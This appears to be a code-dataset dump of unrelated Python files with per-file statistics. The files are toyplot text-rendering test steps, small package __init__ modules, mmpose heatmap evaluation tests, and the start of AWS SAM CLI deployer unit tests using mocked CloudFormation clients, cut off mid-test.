| 29.710145 | 753 | 0.622829 | 1,480 | 10,250 | 4.028378 | 0.133784 | 0.03103 | 0.013083 | 0.015263 | 0.777256 | 0.72895 | 0.722912 | 0.702784 | 0.702784 | 0.682657 | 0 | 0.061643 | 0.238732 | 10,250 | 344 | 754 | 29.796512 | 0.702422 | 0.44478 | 0 | 0.639344 | 1 | 0.02459 | 0.111582 | 0.080044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0 | 0.090164 | 0 | 0.188525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16972a7bcb2a072262ccecd541935694e1b51bbb | 78 | py | Python | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 6 | 2016-05-18T05:53:44.000Z | 2019-06-13T18:27:50.000Z | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 64 | 2015-02-13T18:29:04.000Z | 2018-06-15T19:48:56.000Z | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 2 | 2015-05-08T19:22:12.000Z | 2016-07-11T16:57:49.000Z | from .transformer import *
from .transformers import *
from .cleaver import *
| 19.5 | 27 | 0.769231 | 9 | 78 | 6.666667 | 0.555556 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 78 | 3 | 28 | 26 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16a457972570ee9009d2e82740383cbda0b33fe3 | 6,096 | py | Python | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 438 | 2015-01-06T20:54:02.000Z | 2022-03-15T00:39:33.000Z | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 184 | 2015-01-26T17:04:47.000Z | 2022-02-19T16:29:00.000Z | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 45 | 2015-07-06T18:00:27.000Z | 2022-02-14T12:46:17.000Z | # Copyright 2014, Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains certain
# rights in this software.
from behave import *
import nose.tools
import toyplot.html
@given(u'text with default alignment')
def step_impl(context):
context.axes.text(0, 0, "Text!", style={"font-size": "24px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with left alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "start"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with center alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "middle"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with right alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "end"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with positive anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"Text!",
style={
"font-size": "24px",
"text-anchor": "middle",
"-toyplot-anchor-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with negative anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"Text!",
style={
"font-size": "24px",
"text-anchor": "middle",
"-toyplot-anchor-shift": "-10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with angled anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"+++",
angle=30,
style={
"font-size": "32px",
"-toyplot-anchor-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment top')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "top",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment first baseline')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "first-baseline",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment middle')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "middle",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment last baseline')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "last-baseline",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment bottom')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "bottom",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with alignment baselines')
def step_impl(context):
text = """<span style="alignment-baseline:alphabetic">Alphabetic</span>
<span style="alignment-baseline:middle">Middle</span>
<span style="alignment-baseline:central">Central</span>
<span style="alignment-baseline:hanging">Hanging</span>"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with positive baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "baseline-shift": "100%"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with negative baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "baseline-shift": "-100%"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with angled baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "+++", angle=30, style={"font-size": "32px", "baseline-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@when(u'text is aligned with an unknown text-anchor value, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(
0, 0, "Text!", style={"text-anchor": "foo"})
toyplot.html.render(context.canvas)
@when(u'text is aligned with an unknown alignment-baseline value, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(
0, 0, "Text!", style={"alignment-baseline": "foo"})
toyplot.html.render(context.canvas)
@given(u'rich text {markup}')
def step_impl(context, markup):
context.axes.text(0, 0, markup, color=toyplot.color.black, style={"font-size": "32px"})
@given(u'text using font-family {family}')
def step_impl(context, family):
context.axes.text(0, 0, "Font-family: %s" % family, style={"font-family": family, "font-size": "32px"})
@when(u'text is drawn with an unknown font family, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(0, 0, "Font-family: nonexistent", style={"font-family": "nonexistent", "font-size": "32px"})
context.canvas._repr_html_()
| 27.963303 | 118 | 0.610072 | 788 | 6,096 | 4.685279 | 0.125635 | 0.110238 | 0.062568 | 0.102384 | 0.800921 | 0.765981 | 0.748104 | 0.738082 | 0.721289 | 0.709642 | 0 | 0.030124 | 0.221293 | 6,096 | 217 | 119 | 28.092166 | 0.74763 | 0.027395 | 0 | 0.688623 | 0 | 0 | 0.348979 | 0.063819 | 0 | 0 | 0 | 0 | 0.017964 | 1 | 0.125749 | false | 0 | 0.017964 | 0 | 0.143713 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16a8fb3470aea2a03cbda65e50d77f5d1e1f56c3 | 39 | py | Python | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | # W.I.P.
print("Hello, I am Chesster")
| 13 | 29 | 0.615385 | 8 | 39 | 3 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 39 | 2 | 30 | 19.5 | 0.727273 | 0.153846 | 0 | 0 | 0 | 0 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
16bc58fda13e5293aaa8e61708a5d8246dc675c2 | 35 | py | Python | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | from .evaluate import to_sql_where
| 17.5 | 34 | 0.857143 | 6 | 35 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16db87a2b4a4f981e77a044f8ed63ac7a758371c | 211 | py | Python | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | null | null | null | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | 1 | 2019-08-23T01:52:33.000Z | 2019-08-23T01:52:33.000Z | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | null | null | null | from . import kfext_sim as ext
from extensions import EXTENSION_REGISTRY_MD, EXTENSION_REGISTRY_TD
EXTENSION_REGISTRY_MD.register_extension('sim', ext.MD)
EXTENSION_REGISTRY_TD.register_extension('sim', ext.TD)
| 42.2 | 67 | 0.853081 | 31 | 211 | 5.451613 | 0.387097 | 0.402367 | 0.224852 | 0.248521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07109 | 211 | 4 | 68 | 52.75 | 0.862245 | 0 | 0 | 0 | 0 | 0 | 0.028436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bc6d1c7bdae956b64de9a0347107c74e7a6a2809 | 32 | py | Python | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | from .client import USASpending
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc737c9c939db579d1f2587203d42efde703941c | 66 | py | Python | ir_attachment_url/tests/__init__.py | 001101/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | null | null | null | ir_attachment_url/tests/__init__.py | 001101/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | 1 | 2020-05-03T04:27:29.000Z | 2020-05-03T04:27:29.000Z | ir_attachment_url/tests/__init__.py | eneldoserrata/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | 1 | 2022-02-04T11:27:12.000Z | 2022-02-04T11:27:12.000Z | from . import test_data_get
from . import test_product_tmpl_image
| 22 | 37 | 0.848485 | 11 | 66 | 4.636364 | 0.727273 | 0.392157 | 0.54902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 66 | 2 | 38 | 33 | 0.87931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bcb3788adeb63e41e5addc21dfdeef25b00bbb42 | 6,393 | py | Python | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | import copy
import numpy as np
import torch
from mmpose.core import (aggregate_results, get_group_preds,
get_multi_stage_outputs)
def test_get_multi_stage_outputs():
fake_outputs = [torch.zeros((1, 4, 2, 2))]
fake_flip_outputs = [torch.ones((1, 4, 2, 2))]
# outputs_flip
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=4, with_heatmaps=[False],
with_ae=[True])
assert heatmaps == []
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True],
with_ae=[True])
assert len(heatmaps) == 1
flip_index = [1, 0]
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True],
with_ae=[True], flip_index=flip_index)
assert len(heatmaps) == 2
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
tag_per_joint=False,
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True],
with_ae=[True], flip_index=flip_index)
assert len(heatmaps) == 2
# with heatmaps & with ae
fake_outputs = [torch.zeros((1, 4, 2, 2)), torch.ones((1, 2, 4, 4))]
fake_flip_outputs = [torch.ones((1, 4, 2, 2)), torch.ones((1, 2, 4, 4))]
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True, False],
with_ae=[True, True])
assert torch.allclose(heatmaps[0], torch.tensor(0.))
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False])
assert torch.allclose(heatmaps[0], torch.tensor(0.5))
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, False],
with_ae=[True, False], flip_index=flip_index)
assert torch.allclose(heatmaps[0], torch.tensor(0.))
# size_projected
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False],
size_projected=(8, 8))
assert heatmaps[0].shape == torch.Size([1, 2, 8, 8])
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False],
align_corners=True)
assert torch.allclose(heatmaps[0], torch.tensor(0.5))
def test_aggregate_results():
fake_heatmaps = [torch.zeros((1, 2, 2, 2))]
fake_tags = [torch.zeros((1, 2, 2, 2))]
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=None, tags_list=[],
heatmaps=fake_heatmaps, tags=fake_tags,
test_scale_factor=[1], project2image=True,
flip_test=False)
assert torch.allclose(aggregated_heatmaps, torch.tensor(0.))
fake_aggr_heatmaps = torch.ones(1, 2, 2, 2)
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=True, flip_test=False)
assert torch.allclose(aggregated_heatmaps, torch.tensor(1.))
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=True, flip_test=False,
align_corners=True)
assert torch.allclose(aggregated_heatmaps, torch.tensor(1.))
fake_heatmaps = [torch.zeros((1, 2, 2, 2)), torch.ones((1, 2, 2, 2))]
fake_aggr_heatmaps = torch.ones(1, 2, 4, 4)
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=False, flip_test=True)
assert aggregated_heatmaps.shape == torch.Size((1, 2, 4, 4))
aggregated_heatmaps, tags_list = \
aggregate_results(scale=2, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1, 2],
project2image=False, flip_test=True)
assert aggregated_heatmaps.shape == torch.Size((1, 2, 4, 4))
def test_get_group_preds():
fake_grouped_joints = [np.array([[[0, 0], [1, 1]]])]
results = get_group_preds(
fake_grouped_joints,
center=np.array([0, 0]),
scale=np.array([1, 1]),
heatmap_size=np.array([2, 2]))
assert not results == []
results = get_group_preds(
fake_grouped_joints,
center=np.array([0, 0]),
scale=np.array([1, 1]),
heatmap_size=np.array([2, 2]),
use_udp=True)
assert not results == []
| 48.067669 | 77 | 0.558267 | 719 | 6,393 | 4.685675 | 0.090403 | 0.081923 | 0.042446 | 0.065301 | 0.883942 | 0.872663 | 0.856931 | 0.833779 | 0.777976 | 0.721282 | 0 | 0.028699 | 0.335054 | 6,393 | 132 | 78 | 48.431818 | 0.76382 | 0.007977 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.025 | false | 0 | 0.033333 | 0 | 0.058333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c2f2e2b3194d27eaacddc6d0e67d055c9efa53a | 57,114 | py | Python | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 2,285 | 2017-08-11T16:57:31.000Z | 2018-05-08T20:38:25.000Z | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 314 | 2017-08-11T17:29:27.000Z | 2018-05-08T20:51:47.000Z | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 284 | 2017-08-11T17:35:48.000Z | 2018-05-08T20:15:59.000Z | from logging import captureWarnings
from operator import inv
from typing import Container, Iterable, Union
import uuid
import time
import math
from datetime import datetime, timedelta, timezone
from unittest import TestCase
from unittest.mock import patch, MagicMock, ANY, call
from botocore.exceptions import ClientError, WaiterError, BotoCoreError
from samcli.commands.deploy.exceptions import (
DeployFailedError,
ChangeSetError,
DeployStackOutPutFailedError,
DeployBucketInDifferentRegionError,
)
from samcli.lib.deploy.deployer import Deployer
from samcli.lib.package.s3_uploader import S3Uploader
from samcli.lib.utils.time import utc_to_timestamp, to_datetime
class MockPaginator:
def __init__(self, resp):
self.resp = resp
def paginate(self, ChangeSetName=None, StackName=None):
return self.resp
class MockChangesetWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, ChangeSetName, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
class MockCreateUpdateWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
class CustomTestCase(TestCase):
def assertListSubset(self, l1: Iterable, l2: Union[Iterable, Container], msg=None) -> None:
"""
Assert l2 contains all items in l1.
Just like calling self.assertIn(l1[x], l2) in a loop.
"""
for x in l1:
self.assertIn(x, l2, msg)
class TestDeployer(CustomTestCase):
def setUp(self):
self.session = MagicMock()
self.cloudformation_client = self.session.client("cloudformation")
self.s3_client = self.session.client("s3")
self.deployer = Deployer(self.cloudformation_client)
def test_deployer_init(self):
self.assertEqual(self.deployer._client, self.cloudformation_client)
self.assertEqual(self.deployer.changeset_prefix, "samcli-deploy")
def test_deployer_init_custom_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=10)
self.assertEqual(deployer.client_sleep, 10)
def test_deployer_init_custom_sleep_invalid(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep="INVALID")
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_negative(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=-5)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_zero(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=0)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_default_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"))
self.assertEqual(deployer.client_sleep, 0.5)
def test_deployer_has_no_stack(self):
self.deployer._client.describe_stacks = MagicMock(return_value={"Stacks": []})
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_in_review(self):
self.deployer._client.describe_stacks = MagicMock(
return_value={"Stacks": [{"StackStatus": "REVIEW_IN_PROGRESS"}]}
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception_non_exsistent(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Stack with id test does not exist"}},
operation_name="stack_status",
)
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=Exception())
with self.assertRaises(Exception):
self.deployer.has_stack("test")
def test_deployer_has_stack_exception_botocore(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=BotoCoreError())
with self.assertRaises(DeployFailedError):
self.deployer.has_stack("test")
def test_create_changeset(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_update_changeset(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="UPDATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_create_changeset_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(side_effect=Exception)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException(self):
error_message = (
"An error occurred (ValidationError) when calling the CreateChangeSet "
"operation: S3 error: The bucket you are attempting to access must be "
"addressed using the specified endpoint. "
"Please send all future requests to this "
"endpoint.\nFor more information "
"check http://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html"
)
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": error_message}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployBucketInDifferentRegionError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException_generic(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Message"}}, operation_name="create_changeset")
)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_pass_through_optional_arguments_only_if_having_values(self):
self.deployer.has_stack = MagicMock(return_value=False)
# assert that the arguments; Capabilities, RoleARN & NotificationARNs are passed through if having values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
